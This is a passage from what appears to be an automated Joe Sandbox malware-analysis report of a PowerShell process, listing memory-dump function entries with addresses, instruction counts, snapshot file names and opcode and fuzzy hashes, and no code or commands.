                                                                                                                                                                                                                          • Instruction ID: 6f86b3a057dc2722b16053f791a5e4753137216c75e10473b89e9601e289d0f7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2c5a7bbbc693d182e3c3f6d83abb168ea800039ca19f99a99af9535cec06729
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFF0A7317007149FD7149B59E844A6F77E9EBCC675B10092DE509D3740DF74AC028BA0
                                                                                                                                                                                                                          Function 04E77697 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 049232fed0693e972cc822d0e4d1228fc6df7cfa2617540a63ee5ff0e214bf39
                                                                                                                                                                                                                          • Instruction ID: a1cb41f51e911c57fc430d760986434f96a63f1a7674b4b296471d20b37cb20b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 049232fed0693e972cc822d0e4d1228fc6df7cfa2617540a63ee5ff0e214bf39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23F0E5393002088FDB04EBBCD840A9AB7E2FFCC6657094558EA09CB314DF30EC018BA1
                                                                                                                                                                                                                          Function 04E790F0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 176f5965f9781bbfd59c1b82ca70e97ad95d2a6cf0f4cfadea7db98e2e5a8864
                                                                                                                                                                                                                          • Instruction ID: 6caa146f6851b3f11ebdf31223f02255536ffb0ee1418391edc9b8d0566396e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 176f5965f9781bbfd59c1b82ca70e97ad95d2a6cf0f4cfadea7db98e2e5a8864
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F02775604624DBE304AF68C00879BB7A6EFC5324F10816AC6194B384CE3A7801CBE0
                                                                                                                                                                                                                          Function 04E79160 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 45f8dde0bc5f544203c5030ed87e864265ab05758ada26b5770c95e474b33d03
                                                                                                                                                                                                                          • Instruction ID: d6cd946a02440b3f14a1e3c1177dd1bb28b7878abcdca5fece4954e39c06dc22
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45f8dde0bc5f544203c5030ed87e864265ab05758ada26b5770c95e474b33d03
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F0B4709093118FD7609B78D49C396BFB1FF41310F00485AE199C7241DB382941C790
                                                                                                                                                                                                                          Function 04E79549 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d40f105cdf0790f9cd35f63e8d7c17dbf20f49ae2c317b33f396a99222d88017
                                                                                                                                                                                                                          • Instruction ID: 6de76c8a1e2bf13cb5f9526ce13bbd2b81f06c289f60bba57f0b3d9148a17d3e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d40f105cdf0790f9cd35f63e8d7c17dbf20f49ae2c317b33f396a99222d88017
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E0D862F052311BA74077A9580456A6B8DEFD6A79B1122B39915CB381ED14FC0953B2
                                                                                                                                                                                                                          Function 04E7DED8 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 751ab0ff8de5ec8a275396287aaec7b24f9b32fabe404847b0ccea89525b89a1
                                                                                                                                                                                                                          • Instruction ID: 7504198e54b3979a16a3cd900a3e16cf5a909ed733a799cf28287c8e85ec638f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 751ab0ff8de5ec8a275396287aaec7b24f9b32fabe404847b0ccea89525b89a1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01E0E5353002158F87149B1DD898C26B7FAEFCEA2932910A9F549DB725DA61EC018B90
                                                                                                                                                                                                                          Function 04E7896B Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4a828669a24218b17c8749de6ea1dfaa2ee6dd1863dc70e1dc414da34253ba72
                                                                                                                                                                                                                          • Instruction ID: b5d8961f2c429325bf8e712e5337995e72c1cdc53dbd3b55f0595f917b13fcb7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a828669a24218b17c8749de6ea1dfaa2ee6dd1863dc70e1dc414da34253ba72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF0E5357093A28FCB0A2774981C2AE7F66FFC5325F04009BE6158B282CF682D06C395
                                                                                                                                                                                                                          Function 04E7AF98 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1bd867a344b7438123aece3ce51e589c63f890559fe65b66b4032f00465612df
                                                                                                                                                                                                                          • Instruction ID: cec08cb31c205fee0a1ad0b680f2cc5b6d17eb08722ea0b4d2154796e757682d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bd867a344b7438123aece3ce51e589c63f890559fe65b66b4032f00465612df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E0D8213083920B8B16972DA85045ABB77DFC723031854B7F480CF342EE1198018395
                                                                                                                                                                                                                          Function 04E79170 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 68998c333e85401327d1cfc10d2b2f3e233b7f8104a6c07ea6dfb2313403a0a3
                                                                                                                                                                                                                          • Instruction ID: 4a246776aaee6ede1014122c3f1f8dbc6a8f41b0db44d9233eb00397c957a079
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68998c333e85401327d1cfc10d2b2f3e233b7f8104a6c07ea6dfb2313403a0a3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F06D709003148FD760DF78D89C39ABBE5FB44360F004929D61EC7240DB396880CB90
                                                                                                                                                                                                                          Function 04E78978 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5493e034e1854044042dab2e4d6557fc75e5564cf067784c7a29fb858a58897f
                                                                                                                                                                                                                          • Instruction ID: 442ced9810d775e64833dee3be3577a174dd8ddc3c0714166bee84a030ca4326
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5493e034e1854044042dab2e4d6557fc75e5564cf067784c7a29fb858a58897f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32E0863570462597CB093779A81C2AE7F5AFBC8725F04052AD71687380CF7D790283D9
                                                                                                                                                                                                                          Function 04E79558 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d8745ef515c7156cc51787536d9fd5a1b162e8be1454c7a63d584cea5d120890
                                                                                                                                                                                                                          • Instruction ID: 31a3d1c275bcf4d2fce700d2849e9fcbaa8d26634e289422e7a9043904beff22
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8745ef515c7156cc51787536d9fd5a1b162e8be1454c7a63d584cea5d120890
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FD05E52F051350B6A5436AA18046BBA9CEEFC64B972620B79A05DB242EC44FC0A03F2
                                                                                                                                                                                                                          Function 04E7DD78 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                          • Instruction ID: fe1b5640831345531659b9413aee9621a724b7500c5e4aaf8d2962b6c9bdff34
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BE08631B0001497CB089559D8108DDF7AADFCC220F04907AD90AA7340DA32691587E1
                                                                                                                                                                                                                          Function 04E7DD28 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e423b9e5a0390accafe49c1c23d8318fba784352fd4aa2865a30d6bb60de3729
                                                                                                                                                                                                                          • Instruction ID: 45fb41afc94dfd0c0fe076f1fe22221c08dd773f7c586739de97425f98b39cbe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e423b9e5a0390accafe49c1c23d8318fba784352fd4aa2865a30d6bb60de3729
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E08C35300B104B8216A66EA80089EBB9ADFC95B6310842AE51A9B300DF68EC0247AA
                                                                                                                                                                                                                          Function 04E78739 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8a81ea784d75239312df7dd7c9a0641eb1fcf4d066b7eebbc7da56f9e28bfe75
                                                                                                                                                                                                                          • Instruction ID: 9e61364ddaef0c4da2fc3a8fb49945908a2ebb36db8bf07ec976a5a6e97e4d3f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a81ea784d75239312df7dd7c9a0641eb1fcf4d066b7eebbc7da56f9e28bfe75
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92E04F3480421BCBCB09EFA4E44A4ADFF30FF24301B0001A9E946C3290EB301956CFC5
                                                                                                                                                                                                                          Function 04E7F860 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c1f07b0db481733b86782aa8c6be167040b26a62855d4764b55c23d6687b632c
                                                                                                                                                                                                                          • Instruction ID: 80d68f64f1fd3cdf76bedc0f15c9f9eda9384adfea5fc137a8aa60d1ded810b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1f07b0db481733b86782aa8c6be167040b26a62855d4764b55c23d6687b632c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8E01A70D0424A9F9B80EFA88841599FBF4EB59200F2081AAC918D7201E6329A12CFC1
                                                                                                                                                                                                                          Function 04E78800 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e16a5ca632a9f90adca7ae3f15235a1422efcc6efb0f2f8815112b49369724db
                                                                                                                                                                                                                          • Instruction ID: 5118fbbb011f3336981a1adb340edd48ddf3ecffa957ff3392e1d16ffbf204aa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e16a5ca632a9f90adca7ae3f15235a1422efcc6efb0f2f8815112b49369724db
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E04F31E19247CBCB08EFA4D48546ABFB1FF65205B104195E94997351E7305854CB85
                                                                                                                                                                                                                          Function 04E7F870 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                          • Instruction ID: a2d8eed3a5943f04ad5619105c2428a0566ae510b9d298c2a983eac5ffb1fe67
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0D06270D042099F8780EFADC94156DFBF4EB48210F5085AAC919E7301F7315612DBD1
                                                                                                                                                                                                                          Function 04E78748 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bd36e432e6603a26031e5c6c2f5558614826b65ade25d84828b685e9ca6e1220
                                                                                                                                                                                                                          • Instruction ID: 58922ca9cb84fe314191e6b5b4e9e413b31b657023f36f582914b4c8ee3c7019
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd36e432e6603a26031e5c6c2f5558614826b65ade25d84828b685e9ca6e1220
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0D0673190411A8BCB0CABA5E85B4BDBF74FB14301F404169DA1792290EA352A5ACAC5
                                                                                                                                                                                                                          Function 04E78810 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f735945de095f38d611e2afa18d01062697cb322220bb905bbc3fb75396e79aa
                                                                                                                                                                                                                          • Instruction ID: 8ea12f8f87938a797ca1b69cd4a58be11d5c1ac4b95a4e6bba835450b7c1f624
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f735945de095f38d611e2afa18d01062697cb322220bb905bbc3fb75396e79aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30D01730E0820A8BCB18EFA4E84A86EBFB5BB44201F004169DA0993340EA346D01CBC1
                                                                                                                                                                                                                          Function 04E77EA0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 77a621a7f53d9a44a500362f13609b918c97ca0f6326cb41672b00b9c6ad2221
                                                                                                                                                                                                                          • Instruction ID: bfdec6517773ee8f611acdc79d67697f8b5c3dc925ae56b9f63361495033a979
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a621a7f53d9a44a500362f13609b918c97ca0f6326cb41672b00b9c6ad2221
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8C08C1091C3D10FEF0343300C750227FF04D4734130A95C2C9C19B2B3C8148841D382
                                                                                                                                                                                                                          Function 04E77932 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f6cf24a1db8dd891d67f60878ae189a623f4719e16f653c7d10b8589076dfebe
                                                                                                                                                                                                                          • Instruction ID: b701bf41c11af9bc2389f121542b7a91c5f2ee8a45514c56aa45dc8ce1b403d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6cf24a1db8dd891d67f60878ae189a623f4719e16f653c7d10b8589076dfebe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6D092341092C48FC3060BB494344A13F719F4321632A68DAD8D98F6B3CA266847DB50
                                                                                                                                                                                                                          Function 04E77940 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: db5e4ebf3906c0ada9a2858e6b6b02682a4d1d0f2cd3f77c3de9fcc9629100f9
                                                                                                                                                                                                                          • Instruction ID: a4653e0a756652493db422f4e53ffd4ac9cf3b230dd6b266ac998612e54758cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db5e4ebf3906c0ada9a2858e6b6b02682a4d1d0f2cd3f77c3de9fcc9629100f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0B09230044708CFC2486FB5A4049157729AB4022639004A9ED1E4A6939E3BE886CE44

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 079F1BE0 Relevance: 11.7, Strings: 9, Instructions: 403COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1562192530.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_79f0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 84l$84l$Jl$Jl$Jl$Jl$Jl$rl$rl
                                                                                                                                                                                                                          • API String ID: 0-2781278049
                                                                                                                                                                                                                          • Opcode ID: 8c108d3c2eff1bd5cecd34efc7bc936dadff84130c4c3e2d972d0e177c1ba810
                                                                                                                                                                                                                          • Instruction ID: b232f8f9b0e1506f44877a14caa47a4da595c9deff74f9e069d0e1b82a836571
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c108d3c2eff1bd5cecd34efc7bc936dadff84130c4c3e2d972d0e177c1ba810
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6D128B1B0430ACFC7259B6894007AABBB6AFC6315F28C4BBDA55CB251DB31C855C7E1
                                                                                                                                                                                                                          Function 079F2109 Relevance: 7.6, Strings: 6, Instructions: 117COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1562192530.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_79f0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Jl$Jl$Jl$Jl$Jl$Jl
                                                                                                                                                                                                                          • API String ID: 0-3334521869
                                                                                                                                                                                                                          • Opcode ID: a14193c185383744035e51cf3074b03971fe1670d00191f389e0a892e427e97e
                                                                                                                                                                                                                          • Instruction ID: 844be315842072045fe40bc69c1903d40b744016c7654e6de43c55e282b4772f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a14193c185383744035e51cf3074b03971fe1670d00191f389e0a892e427e97e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E4121B660D7818FC32687384C1179A7F766FC3604B1984ABC6409F6A3D6358C65C3A6

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 02C1D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.1616475667.0000000002C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_2c1d000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0e079124c55992913e41f10b685eee39644e6886801ab44bb1d6fee26fcdc85c
                                                                                                                                                                                                                          • Instruction ID: 6fe160c85bc1f27625d329fc5239f7fe0ef722c932f0e8297e2c0c1a431e0083
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e079124c55992913e41f10b685eee39644e6886801ab44bb1d6fee26fcdc85c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6015E7140E3C49FD7128B258894B52BFB4DF47224F1D80DBD9888F1A3C2695849DBB2
                                                                                                                                                                                                                          Function 02C1D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
